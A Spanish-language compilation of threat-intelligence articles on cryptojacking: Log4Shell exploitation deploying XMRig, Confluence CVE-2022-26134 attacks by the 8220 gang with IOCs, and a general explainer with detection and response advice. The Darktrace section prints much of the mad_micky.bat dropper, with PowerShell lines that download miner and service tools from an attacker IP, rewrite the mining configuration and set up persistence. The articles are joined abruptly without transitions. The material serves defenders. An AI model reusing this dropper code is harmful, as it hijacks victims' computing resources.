
La vulnerabilidad CVE-2021-44228 permite la ejecución remota de código sin autenticación en varias versiones de Apache Log4j2 (Log4Shell). Los atacantes pueden explotar servidores vulnerables conectándose a través de cualquier protocolo, como HTTPS, y enviando una cadena especialmente diseñada.
El equipo de seguridad de Alibaba Cloud reveló públicamente una vulnerabilidad crítica (CVE-2021-44228) que permite la ejecución remota de código sin autenticación contra múltiples versiones de Apache Log4j2 (Log4Shell). Los servidores vulnerables pueden ser explotados por atacantes que se conectan a través de cualquier protocolo, como HTTPS, y envían una cadena especialmente diseñada.
Darktrace detectó criptominería en múltiples implementaciones de clientes como resultado de la explotación de esta vulnerabilidad de Log4j. En cada uno de estos incidentes, la explotación se produjo a través de conexiones SSL salientes que parecían ser solicitudes de scripts de PowerShell codificados en base64 para evadir las defensas perimetrales y descargar archivos de script por lotes (.bat), así como múltiples ejecutables que instalan malware de criptominería. La actividad presentaba indicadores de campaña más amplios, incluidas IPs hardcodeadas comunes, archivos ejecutables y scripts.
El ciclo de ataque comienza con lo que parece ser un escaneo oportunista de dispositivos conectados a Internet en busca de servidores VMWare Horizons vulnerables al exploit Log4j. Una vez que se encuentra un servidor vulnerable, el atacante realiza conexiones HTTP y SSL hacia la víctima. Tras una explotación exitosa, el servidor realiza una devolución de llamada (callback) en el puerto 1389, recuperando un script llamado mad_micky.bat. Esto logra lo siguiente:
En al menos dos casos, el script mad_micky.bat se recuperó en una conexión HTTP que tenía el user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). Esta fue la primera y única vez que se vio este user agent en estas redes. Parece que este user agent es utilizado legítimamente por algunos dispositivos ASUS con instalaciones de fábrica recientes; sin embargo, al ser un user agent nuevo visto solo durante esta actividad, resulta sospechoso.
Tras una explotación exitosa, el servidor realiza una devolución de llamada en el puerto 1389 para recuperar archivos de script. En este ejemplo, /xms.ps1, un script de PowerShell codificado en base64 que evade la política de ejecución en el host para invocar ‘mad_micky.bat’:
Figura 1: Información adicional sobre el script de PowerShell xms.ps1
La captura detalla el registro de eventos de un servidor afectado e indica una RCE de Log4j exitosa que resultó en la descarga del archivo mad_micky.bat:
Figura 2: Datos de registro que resaltan el archivo mad_micky.bat
Se iniciaron conexiones adicionales para recuperar archivos ejecutables y scripts. Los scripts contenían dos direcciones IP ubicadas en Corea y Ucrania. Se realizó una conexión a la IP ucraniana para descargar el archivo ejecutable xm.exe, que activa el minero. El minero, XMRig Miner (en este caso), es una herramienta de minería de código abierto y multiplataforma disponible para descargar desde múltiples ubicaciones públicas. La siguiente descarga de ejecutable observada fue ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).
Figura 3: Información adicional sobre el ejecutable XMRig
La conexión a la IP coreana implicó una solicitud de otro script (/2.ps1), así como de un archivo ejecutable (LogBack.exe). Este script elimina tareas en ejecución asociadas con el registro, incluidos el filtro de registro de eventos de SCM o el consumidor de registro de eventos de PowerShell. El script también solicita un archivo de Pastebin, que posiblemente sea un archivo de configuración de beacon de Cobalt Strike. Las eliminaciones de registros se realizaron a través de tareas programadas y WMI e incluyeron: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.
El segundo archivo solicitado de Pastebin, aunque ya no está alojado por Pastebin, es parte de un comando schtasks y, por lo tanto, probablemente se usa para establecer persistencia:
El archivo ejecutable Logback.exe es otra herramienta de minería XMRig. También se descargó un archivo config.json desde la misma IP coreana. Después de esto, se utilizaron comandos cmd.exe y wmic para configurar el minero.
Estas descargas de archivos y la configuración del minero fueron seguidas por conexiones adicionales a Pastebin.
Figura 4: Correlación OSINT del archivo mad_micky.bat
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
echo copying to mimu directory
if errorlevel 1 (
echo ERROR: Can’t download MoneroOcean advanced version of xmrig
goto MINER_BAD)echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
if errorlevel 1 (
echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
if %ADMIN% == 1 goto ADMIN_MINER_SETUP
if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
if errorlevel 1 (
echo ERROR: Can’t download tools to make gado_miner service
exit /b 1Las alertas de modelos clave que Darktrace utilizó para identificar esta campaña incluyen modelos centrados en compromisos para Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server y Beaconing to Rare Destination. Modelos centrados en archivos para Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations y Compressed Content from Rare External Location. La minería de criptomonedas se detecta bajo los modelos Cryptocurrency Mining Activity.
Los modelos asociados con Unusual PowerShell to Rare and New User Agent resaltan las conexiones anómalas en los dispositivos infectados después de las devoluciones de llamada de Log4j.
Los clientes con la tecnología Autonomous Response de Darktrace, Antigena, también contaron con acciones para bloquear los archivos y scripts entrantes descargados y restringir los dispositivos infectados a su patrón normal de vida, con el fin de prevenir tanto las descargas iniciales de archivos maliciosos como la actividad continua de criptominería.
El 31 de mayo, Volexity, una empresa de seguridad, reportó a Atlassian una vulnerabilidad crítica sin parchear que afecta a todas las versiones compatibles de Confluence Server y Data Center.
Atlassian advirtió a sus clientes sobre la vulnerabilidad crítica el 2 de junio y publicó un parche un día después. CISA agregó esta vulnerabilidad a su lista de Known Exploited Vulnerabilities el 3 de junio.
Check Point lanzó una protección dedicada para prevenir un ataque que explote esta vulnerabilidad y recomienda a los clientes parchear los sistemas afectados.
La vulnerabilidad
La vulnerabilidad en Atlassian Confluence y Data Center, designada como CVE-2022-26134, puede provocar un ataque de inyección de expresiones Object-Graph Navigation Language (OGNL) sin autenticación.
Un atacante remoto no autenticado puede utilizar esta vulnerabilidad para ejecutar código arbitrario en el servidor objetivo colocando una carga maliciosa en la URI.

Figura 1: Carga maliciosa que explota CVE-2022-26134.
Explotación en el mundo real
Los investigadores de Check Point Research (CPR) notaron una gran cantidad de intentos de explotación desde que se publicó la vulnerabilidad. Al principio, muchos de los posibles atacantes utilizaron métodos de escaneo para identificar objetivos vulnerables. Después de unos días, los atacantes comenzaron a utilizar la vulnerabilidad para descargar malware en los sistemas afectados.
Entre los registros de explotación, los investigadores notaron algunas cargas maliciosas relacionadas con la misma campaña y originadas desde la misma fuente, pero dirigidas a diferentes plataformas: Linux y Windows.
La cadena de infección depende del sistema operativo de la víctima.
Ataque dirigido al sistema operativo Linux
El atacante utilizó la vulnerabilidad de día cero de Atlassian enviando una solicitud HTTP manipulada a la víctima.

Figura 2: Una solicitud HTTP manipulada que explota CVE-2022-26134 con una carga codificada en base64.
La cadena base64 se decodifica en otra cadena codificada en base64. En general, los investigadores tuvieron que decodificar la cadena varias veces para obtener la carga real.

Figura 3: La cadena base64 decodificada.
Este script descarga un archivo de script bash llamado xms desde el servidor C&C remoto a la carpeta tmp de la víctima, lo ejecuta y lo elimina después.

Figura 4: Parte del script malicioso xms.
El xms es un script dropper. Desinstala los agentes en ejecución de la máquina de la víctima y se añade a los trabajos cron para mantener la persistencia tras el reinicio.
Además, se realiza constantemente una prueba de conectividad de red a a[.]oracleservice.top.
En un intento de propagarse a otras máquinas, el script busca claves ssh e intenta conectarse. Luego descarga el archivo xms desde el servidor C&C y lo ejecuta.
El script descarga un archivo ejecutable elf llamado dbused a la carpeta tmp en varias IPs remotas.
El archivo dbused está empaquetado con upx para evitar la detección estática.
El archivo elf es un minero de criptomonedas que agota los recursos de la máquina de la víctima:

Figura 5: El proceso dbused agota los recursos del sistema.
Ataque dirigido al sistema operativo Windows
El atacante utilizó la vulnerabilidad de Atlassian para ejecutar un cradle de descarga de PowerShell e iniciar un ataque sin archivos desde un servidor C&C remoto.

Figura 6: Una solicitud HTTP manipulada que explota CVE-2022-26134 mediante comandos de PowerShell.
El script lol.ps1 se inyecta en un proceso de memoria de PowerShell.
El script verifica la arquitectura del procesador, usando wmi para comprobar si coincide con sus requisitos.
Luego descarga un archivo ejecutable llamado checkit2 a la carpeta tmp y lo ejecuta en modo oculto.

Figura 7: El script lol.ps1.
El proceso checkit2.exe genera un proceso hijo, llamado InstallUtil.exe, que se conecta al servidor C&C. A su vez, InstallUtil.exe genera otro proceso hijo, AddInProcess.exe, que es el minero de criptomonedas. Después de unos momentos de ejecución en la máquina de la víctima, el proceso checkit2 se termina a sí mismo.
![]()
Figura 8: El proceso checkit2.exe ejecutándose en el sistema.
![]()
Figura 9: El proceso InstallUtil.exe ejecutándose en el sistema.
El malware descarga una nueva copia de sí mismo, con un nuevo nombre, en la carpeta del Menú Inicio.

Figura 10: El archivo cloud.exe descargado en la carpeta de Inicio.
El minero de criptomonedas ahora se ejecuta en la máquina y agota todos los recursos del sistema:
![]()
Figura 11: Información del monedero de criptomonedas.
Cadena de ataque
Ambos escenarios de ataque comienzan con una solicitud HTTP manipulada inicial que explota la vulnerabilidad CVE-2022-26134. El atacante ejecuta comandos utilizando la función de ejecución de Java para descargar un payload malicioso a la máquina de la víctima.
El payload malicioso descarga entonces un archivo ejecutable según el sistema operativo afectado. Ambos ejecutables ejecutan un minero de criptomonedas para aprovechar los recursos de la víctima en su propio beneficio.
Actores de amenazas
El dominio a[.]oracleservice.top y el monedero de criptomonedas que extrajimos del sistema están relacionados con un grupo cibercriminal llamado la “pandilla 8220”.
Protecciones de Check Point:
IPS:
Ejecución remota de código en Atlassian Confluence (CVE-2022-26134)
Anti-Bot:
Trojan.WIN32.XMRig
IOCs:
198.251.86[.]46
51.79.175[.]139
167.114.114[.]169
146.59.198[.]38
51.255.171[.]23
a.oracleservice[.]top
d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e
2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0
4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9
4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0
Monedero Monero:
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
El criptojacking es el uso no autorizado de los recursos informáticos de otra persona para minar criptomonedas. Los hackers buscan secuestrar cualquier tipo de sistema que puedan tomar—escritorios, servidores, infraestructura en la nube y más—para minar criptomonedas de forma ilícita.
Independientemente del mecanismo de entrega, el código de criptojacking suele funcionar silenciosamente en segundo plano mientras las víctimas desprevenidas usan sus sistemas con normalidad. Las únicas señales que podrían notar son un rendimiento más lento, retrasos en la ejecución, sobrecalentamiento, consumo excesivo de energía o facturas de computación en la nube anormalmente altas.
La minería de monedas es un proceso legítimo en el mundo de las criptomonedas que libera nueva criptomoneda en circulación. El proceso funciona recompensando con moneda al primer minero que resuelve un problema computacional complejo. Ese problema completa bloques de transacciones verificadas que se añaden a la cadena de bloques de la criptomoneda.
“Los mineros esencialmente cobran por su trabajo como auditores. Hacen el trabajo de verificar la legitimidad de las transacciones de Bitcoin”, detalló un explicador reciente de Investopedia sobre cómo funciona la minería de Bitcoin. “Además de llenar los bolsillos de los mineros y respaldar el ecosistema de Bitcoin, la minería cumple otro propósito vital: es la única forma de liberar nueva criptomoneda en circulación”.
Ganar criptomonedas mediante la minería de monedas normalmente requiere una enorme cantidad de potencia de procesamiento y energía. Además, el ecosistema de las criptomonedas está diseñado de manera que hace la minería más difícil y reduce las recompensas con el tiempo y con más competencia minera. Esto convierte la minería legítima de criptomonedas en un asunto extremadamente costoso, con gastos que aumentan constantemente.
Los ciberdelincuentes reducen los costes de la minería simplemente robando recursos informáticos y energéticos. Utilizan una serie de técnicas de hacking para obtener acceso a sistemas que realizarán el trabajo computacional de forma ilícita y luego hacen que estos sistemas secuestrados envíen los resultados a un servidor controlado por el hacker.
Los métodos de ataque están limitados únicamente por la creatividad de los criptojackers, pero los siguientes son algunos de los más comunes que se utilizan hoy en día.
En el pasado, el criptojacking era principalmente una estrategia de malware de endpoints, que existía como un objetivo más de lucro para colocar malware en ordenadores de escritorio y portátiles. El malware tradicional de criptojacking se entrega a través de vías típicas como malware sin archivos, esquemas de phishing y scripts maliciosos incrustados en sitios web y aplicaciones web.
La forma más básica en que los atacantes de criptojacking pueden robar recursos es enviando a los usuarios finales un correo electrónico de apariencia legítima que los anima a hacer clic en un enlace que ejecuta código para colocar un script de criptominería en su ordenador. Este se ejecuta en segundo plano y envía los resultados a través de una infraestructura de comando y control (C2).
Otro método es inyectar un script en un sitio web o en un anuncio que se entrega a múltiples sitios web. Una vez que las víctimas visitan el sitio web o el anuncio infectado aparece en sus navegadores, el script se ejecuta automáticamente. No se almacena ningún código en los ordenadores de las víctimas.
Estas vías siguen siendo una preocupación legítima, aunque los delincuentes han añadido técnicas significativamente más sofisticadas a sus manuales de criptojacking mientras buscan aumentar sus beneficios; algunos de estos métodos en evolución se describen a continuación.
Los atacantes buscan aumentar la rentabilidad del criptojacking expandiendo sus horizontes hacia servidores, dispositivos de red e incluso dispositivos IoT. Los servidores, por ejemplo, son un objetivo especialmente jugoso ya que normalmente tienen más potencia que un ordenador de escritorio corriente. También son un campo de caza privilegiado en 2022, ya que los delincuentes escanean servidores expuestos a internet público que contienen vulnerabilidades como Log4J, explotando la falla y cargando silenciosamente software de criptominería en el sistema conectado a los servidores del hacker. A menudo, los atacantes utilizan el sistema inicialmente comprometido para mover su criptojacking lateralmente hacia otros dispositivos de red.
“Estamos viendo un aumento en la criptominería derivada de la vulnerabilidad Log4J”, dice Sally Vincent, ingeniera sénior de investigación de amenazas de LogRhythm. “Los hackers están irrumpiendo en las redes e instalando malware que utiliza almacenamiento para minar criptomonedas”.
Los ciberdelincuentes están atacando la cadena de suministro de software sembrando repositorios de código abierto con paquetes y bibliotecas maliciosos que contienen scripts de criptojacking incrustados en su código. Con desarrolladores descargando estos paquetes por millones en todo el mundo, estos ataques pueden escalar rápidamente la infraestructura de criptojacking para los delincuentes de dos maneras. Los paquetes maliciosos pueden usarse para atacar los sistemas de los desarrolladores—y las redes y recursos en la nube a los que se conectan—para utilizarlos directamente como recursos ilícitos de criptominería. O pueden aprovechar estos ataques para envenenar el software que estos desarrolladores están construyendo con componentes que ejecutan scripts de criptominería en las máquinas del usuario final de una aplicación.
Muchas empresas de criptojacking están aprovechando la escalabilidad de los recursos en la nube irrumpiendo en la infraestructura en la nube y accediendo a una colección aún más amplia de grupos de cómputo para alimentar su actividad minera. Un estudio del otoño pasado del Equipo de Acción de Ciberseguridad de Google informó que el 86% de las instancias en la nube comprometidas se utilizan para criptominería.
“Hoy en día, los atacantes están apuntando a los servicios en la nube por cualquier medio para minar cada vez más criptomonedas, ya que los servicios en la nube pueden permitirles ejecutar sus cálculos a mayor escala que una sola máquina local, ya sea apoderándose del entorno en la nube administrado de un usuario o incluso abusando de aplicaciones SaaS para ejecutar sus cálculos”, escribió Guy Arazi, investigador sénior de seguridad de Palo Alto Networks, en una publicación de blog.
Uno de los métodos comunes para hacerlo es escanear en busca de API de contenedores expuestas o buckets de almacenamiento en la nube no seguros y usar ese acceso para comenzar a cargar software de minería de monedas en instancias de contenedores afectadas o servidores en la nube. El ataque suele automatizarse con software de escaneo que busca servidores accesibles desde internet público con API expuestas o posible acceso no autenticado. Los atacantes generalmente usan scripts para colocar los payloads mineros en el sistema inicial y buscar formas de propagarse a través de los sistemas en la nube conectados.
“La rentabilidad y la facilidad de llevar a cabo criptojacking a escala hacen que este tipo de ataque sea un objetivo fácil”, dijo Matt Muir, investigador de seguridad de Cado Security, en una publicación de blog en la que explica que los ataques basados en la nube son particularmente lucrativos. “Esto probablemente continuará mientras los usuarios sigan exponiendo servicios como Docker y Redis a redes no confiables”.
Según un informe de ReasonLabs, en el último año el 58,4% de todos los troyanos detectados eran mineros de monedas de criptojacking. Mientras tanto, otro estudio de SonicWall encontró que 2021 fue el peor año hasta la fecha para los ataques de criptojacking, con la categoría registrando 97,1 millones de ataques durante el año. Estas cifras son tan contundentes porque el criptojacking es prácticamente una fábrica de dinero para los ciberdelincuentes.
Cuando un delincuente puede minar criptomonedas en un grupo aparentemente ilimitado de recursos informáticos gratuitos de las máquinas de las víctimas, el beneficio para ellos es enorme. Incluso con la caída precipitada de la valoración de Bitcoin esta primavera que la llevó por debajo del nivel de los 30.000 dólares, los márgenes ilegales de los criptojackers siguen teniendo sentido comercial, ya que el valor de lo que minan supera con creces los costes de su infraestructura criminal.
Un honeypot del equipo de investigación de seguridad de Cado Labs descubrió un ataque de criptojacking de múltiples etapas que ataca endpoints expuestos de la API de Docker Engine y servidores Redis, y puede propagarse de manera similar a un gusano. El ataque es perpetrado por el grupo de ataque WatchDog, que ha estado particularmente activo a finales de 2021 y 2022 con numerosas campañas de criptojacking.
TeamTNT fue uno de los primeros grupos de hacking en desplazar el enfoque del criptojacking hacia los servicios orientados a la nube. Investigadores de TrendMicro a finales de 2021 informaron que este grupo, junto con rivales como la banda Kinsig, estaban llevando a cabo campañas de criptojacking que instalaban mineros en instancias de Alibaba Elastic Computing Service (ECS) y deshabilitaban funciones de seguridad para evadir la detección.
La vulnerabilidad Log4Shell ha sido una bendición para los atacantes de criptojacking en 2022. En un ejemplo notable, investigadores de Sophos descubrieron a principios de este año que una ‘horda’ de atacantes estaba apuntando a servidores VMware Horizon para entregar una variedad de payloads de criptojacking que incluían z0Miner, el minero JavaX y al menos dos variantes de XMRig, los bots mineros de criptomonedas Jin y Mimu.
Los expertos en seguridad de la cadena de suministro de software de Sonatype en el otoño de 2021 dieron la alarma sobre paquetes maliciosos de criptominería ocultos en npm, el repositorio de paquetes de JavaScript utilizado por desarrolladores de todo el mundo. En ese momento encontró un trío de paquetes, al menos uno de los cuales se hacía pasar por una biblioteca legítima y popular utilizada por desarrolladores llamada “ua-parser-js”, que recibe más de 7 millones de descargas semanales y sería una forma ideal de atraer a los desarrolladores para que descargaran accidentalmente un código malicioso y lo instalaran en su software.
Unos meses después de ese informe, los investigadores de WhiteSource (ahora Mend) publicaron un informe adicional que mostró que npm está repleto de código malicioso—hasta 1.300 paquetes maliciosos que incluyen criptojacking y otros comportamientos nefarios.
El verano pasado, Bitdefender descubrió un grupo de amenazas rumano que atacaba máquinas basadas en Linux con credenciales SSH para desplegar malware de minería de Monero. Las herramientas que utilizaban se distribuían bajo un modelo «as-a-service». Este ejemplo estaba en la punta de lanza de lo que parece ser una tendencia creciente de ataques de criptominería en sistemas Linux. Un informe de VMware publicado a principios de este año detallaba un creciente enfoque en los entornos multinube basados en Linux, en particular mediante el uso del software de minería XMRig.
«Muchas de las muestras de criptominería de sistemas basados en Linux tienen alguna relación con la aplicación XMRig», explicaba el informe, que mostró que el 89 % de los ataques de criptominería utilizaban bibliotecas relacionadas con XMRig. «Por lo tanto, cuando se identifican bibliotecas y módulos específicos de XMRig en binarios de Linux, es probable que sea evidencia de un posible comportamiento de criptominería.
CoinStop es otra campaña de criptojacking descubierta recientemente que ataca a proveedores de servicios en la nube (CSP) asiáticos. Esta se distinguió por sus medidas de antiforense y evasión. Estas incluían el timestomping para manipular las marcas de tiempo del sistema, la eliminación de las políticas criptográficas del sistema y el uso del archivo de dispositivo /dev/tcp para crear una sesión de shell inversa, explicó Muir, de Cado, en un informe sobre el ataque.
Los criptojackers a veces pueden llegar a grandes extremos para robar no solo potencia de procesamiento, sino también energía y recursos de red de la infraestructura corporativa. El año pasado, los analistas de Darktrace destacaron un ejemplo anónimo de uno de sus clientes en el que descubrieron una granja de criptominería en un almacén que estaba disfrazada dentro de un conjunto de cajas de cartón aparentemente inofensivas. Dentro había un equipo sigiloso con múltiples GPU conectadas a la red eléctrica de la empresa,
Dado que ha evolucionado hasta convertirse en un ataque multivectorial que abarca recursos de endpoints, servidores y nube, prevenir el criptojacking requiere una estrategia de defensa orquestada y completa. Los siguientes pasos pueden ayudar a evitar que el criptojacking se descontrole en los recursos empresariales.
Emplee una protección sólida de endpoints: La base de esto es utilizar protección de endpoints y antimalware capaz de detectar criptomineros, así como mantener los filtros web actualizados y gestionar las extensiones del navegador para minimizar el riesgo de que se ejecuten scripts basados en navegador. Las organizaciones deberían buscar idealmente plataformas de protección de endpoints que puedan extenderse a servidores y más allá.
Parchee y endurezca los servidores (y todo lo demás). Los criptojackers tienden a buscar la fruta más fácil de alcanzar que puedan cosechar silenciosamente—eso incluye escanear en busca de servidores expuestos públicamente con vulnerabilidades antiguas. El endurecimiento básico de servidores, que incluye aplicar parches, desactivar servicios no utilizados y limitar las huellas externas, puede contribuir en gran medida a minimizar el riesgo de ataques basados en servidores.
Utilice el análisis de composición de software. Las herramientas de análisis de composición de software (SCA) proporcionan una mejor visibilidad de qué componentes se utilizan dentro del software para prevenir ataques de cadena de suministro que aprovechan scripts de minería de criptomonedas.
Busque las configuraciones incorrectas en la nube. Una de las formas más impactantes en que las organizaciones pueden detener el criptojacking en la nube es endureciendo las configuraciones de la nube y de los contenedores. Eso significa encontrar servicios en la nube expuestos a Internet público sin la autenticación adecuada, eliminar servidores API expuestos y eliminar credenciales y otros secretos almacenados en entornos de desarrollo o integrados directamente en las aplicaciones.
El criptojacking es un ciberataque clásico de tipo «lento y sigiloso» diseñado para dejar señales mínimas y evitar la detección a largo plazo. Si bien las plataformas de protección de endpoints y las tecnologías de detección y respuesta de endpoints han avanzado mucho en la alerta de ataques de criptojacking, los delincuentes son maestros de la evasión en este frente y detectar mineros ilícitos de criptomonedas aún puede resultar difícil, especialmente cuando solo unos pocos sistemas están comprometidos. Los siguientes son algunos métodos adicionales para detectar señales de criptojacking.
Capacite a su mesa de ayuda para que busque señales de criptominería. A veces, la primera indicación en los endpoints de los usuarios es un aumento en las quejas a la mesa de ayuda sobre el rendimiento lento de las computadoras. Eso debería ser una bandera roja para investigar más a fondo, al igual que los dispositivos que se sobrecalientan o el bajo rendimiento de la batería en los dispositivos móviles.
Implemente una solución de monitoreo de red. Las herramientas de monitoreo de red pueden ofrecer un poderoso medio para detectar los tipos de tráfico web y tráfico C2 saliente que indican actividad de criptojacking, sin importar el dispositivo del que provengan.
«Si tiene un buen filtrado de salida en un servidor donde esté vigilando el inicio de conexiones salientes, esa puede ser una buena detección de [malware de criptominería]», ]», dice Travis Farral, vicepresidente y CISO de Archaea Energy. No obstante, advierte que los autores de criptomineros pueden escribir su malware para evitar ese método de detección.
Utilice monitoreo en la nube y seguridad en tiempo de ejecución de contenedores. Las herramientas en evolución, como el monitoreo en la nube y el escaneo de seguridad en tiempo de ejecución de contenedores, pueden ofrecer visibilidad adicional en los entornos de nube que puedan verse afectados por criptomineros no autorizados. Los proveedores de nube están integrando este tipo de visibilidad en sus servicios, a veces como complementos. Por ejemplo, Google Cloud amplió su Security Command Center a principios de este año para incluir lo que denomina Virtual Machine Threat Detection (VMTD) y así detectar señales de criptominería en la nube, entre otras amenazas en la nube.
Realice búsquedas de amenazas periódicas. Dado que muchos ataques de criptojacking son sigilosos y dejan pocos rastros, las organizaciones pueden necesitar tomar medidas más activas, como la búsqueda de amenazas, para buscar regularmente señales sutiles de compromiso y llevar a cabo investigaciones.
«Los equipos de seguridad de endpoints y de SOC deberían invertir tiempo en ejercicios activos y búsquedas de amenazas en lugar de esperar a que ocurra algo potencialmente catastrófico», dice Vincent, de LogRhythm.
Monitoree sus sitios web en busca de código de criptominería. Farral advierte que los criptojackers están encontrando formas de colocar fragmentos de código JavaScript en los servidores web. «El servidor en sí no es el objetivo, sino cualquier persona que visite el sitio web [corre el riesgo de infectarse]», dice. Recomienda monitorear regularmente los cambios de archivos en el servidor web o los cambios en las propias páginas.
Una vez detectada la actividad ilícita de criptominería, responder a un ataque de criptojacking debe seguir los pasos estándar de respuesta a incidentes cibernéticos, que incluyen contención, erradicación, recuperación y lecciones aprendidas. Algunos consejos para responder a un ataque de criptojacking incluyen:
Detenga los scripts distribuidos a través de la web. Para los ataques de JavaScript en el navegador, la solución es simple una vez que se detecta la criptominería: cierre la pestaña del navegador que ejecuta el script. El departamento de TI debe anotar la URL del sitio web que es la fuente del script y actualizar los filtros web de la empresa para bloquearla.
Apague las instancias de contenedores comprometidas. La infraestructura de nube inmutable, como las instancias de contenedores comprometidas con mineros de criptomonedas, también se puede manejar de forma simple apagando las instancias de contenedores infectadas y comenzando de nuevo. Sin embargo, las organizaciones deben investigar las causas raíz que llevaron al compromiso del contenedor en primer lugar. Esto significa buscar señales de que el panel de control y las credenciales del contenedor han sido comprometidos y examinar los recursos de nube conectados en busca de señales de compromiso. Un paso clave es asegurarse de que la nueva imagen de contenedor que reemplace a la anterior no esté configurada de manera similar.
Reduzca los permisos y regenere las claves de API. Erradicar y recuperarse por completo del criptojacking basado en la nube requerirá que las organizaciones reduzcan los permisos en los recursos de nube afectados (y en los conectados a ellos) y regeneren las claves de API para evitar que los atacantes vuelvan a entrar directamente en el mismo entorno de nube.
Aprenda y adáptese. Use la experiencia para comprender mejor cómo el atacante pudo comprometer sus sistemas. Actualice la formación de sus usuarios, mesa de ayuda, TI y analistas de SOC para que estén mejor preparados para identificar intentos de criptojacking y responder en consecuencia.
Nota del editor: Este artículo, publicado originalmente en febrero de 2018, ha sido actualizado para incluir nuevas investigaciones, mejores prácticas y ejemplos de criptojacking.
